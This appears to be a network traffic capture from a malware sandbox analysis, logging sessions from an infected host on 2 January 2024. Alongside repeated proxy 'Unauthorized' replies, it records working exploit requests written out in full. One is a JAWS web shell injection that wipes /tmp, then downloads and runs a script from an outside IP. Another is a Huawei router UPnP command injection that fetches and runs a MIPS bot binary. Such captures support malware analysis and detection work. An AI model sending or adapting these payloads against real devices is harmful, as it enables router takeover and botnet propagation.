                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:55Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          388192.168.2.2339130146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:56.509140968 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:55Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          389192.168.2.2339140146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:56.833362103 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:56Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          390192.168.2.2339148146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:57.161798000 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:56Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          391192.168.2.2339154146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:57.489039898 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:56Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          392192.168.2.2339158146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:57.818139076 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:57Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          393192.168.2.2339162146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:58.145251989 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:57Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          394192.168.2.2339172146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:58.479110956 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:57Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          395192.168.2.2339988148.231.244.9780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:58.640722990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.496385098 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:00.488248110 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:02.471965075 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:06.439399958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:14.374294996 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.244029999 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          396192.168.2.2344926104.75.225.9180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:58.708367109 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:58.942331076 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:24:58 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:58 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 63 35 37 63 38 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 39 38 26 23 34 36 3b 35 64 34 33 62 30 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;2c57c817&#46;1704173098&#46;5d43b08</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          397192.168.2.2339184146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:58.817795038 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:58Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          398192.168.2.235764620.244.147.18380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:58.867978096 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          399192.168.2.2340696102.130.122.21780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:58.885495901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.297518015 CET932INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 681
                                                          date: Tue, 02 Jan 2024 05:24:58 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          400192.168.2.2354452185.79.154.21080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:58.941620111 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.173659086 CET632INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:47:59 GMT
                                                          Server:
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Security-Policy: frame-ancestors 'self'
                                                          X-XSS-Protection: 1; mode=block
                                                          Strict-Transport-Security: max-age=15552000
                                                          X-UA-Compatible: IE=Edge
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 54 68 65 20 72 65 71 75 65 73 74 20 6c 69 6e 65 20 63 6f 6e 74 61 69 6e 65 64 20 69 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 73 20 66 6f 6c 6c 6f 77 69 6e 67 20 74 68 65 20 70 72 6f 74 6f 63 6f 6c 20 73 74 72 69 6e 67 2e 3c 50 3e 0a 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>The request line contained invalid characters following the protocol string.<P><P></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          401192.168.2.2345034198.12.222.11380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:58.944478035 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.129774094 CET334INHTTP/1.1 301 Moved Permanently
                                                          Date: Tue, 02 Jan 2024 05:24:59 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.26
                                                          X-Redirect-By: Solid Security
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Location: https://www.cmliray.cl/shell?cd+/tmp;rm+-rf+*;wget+
                                                          Vary: Accept-Encoding
                                                          Content-Length: 0
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          402192.168.2.2337722156.253.47.15437215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.013684034 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:00.520215988 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
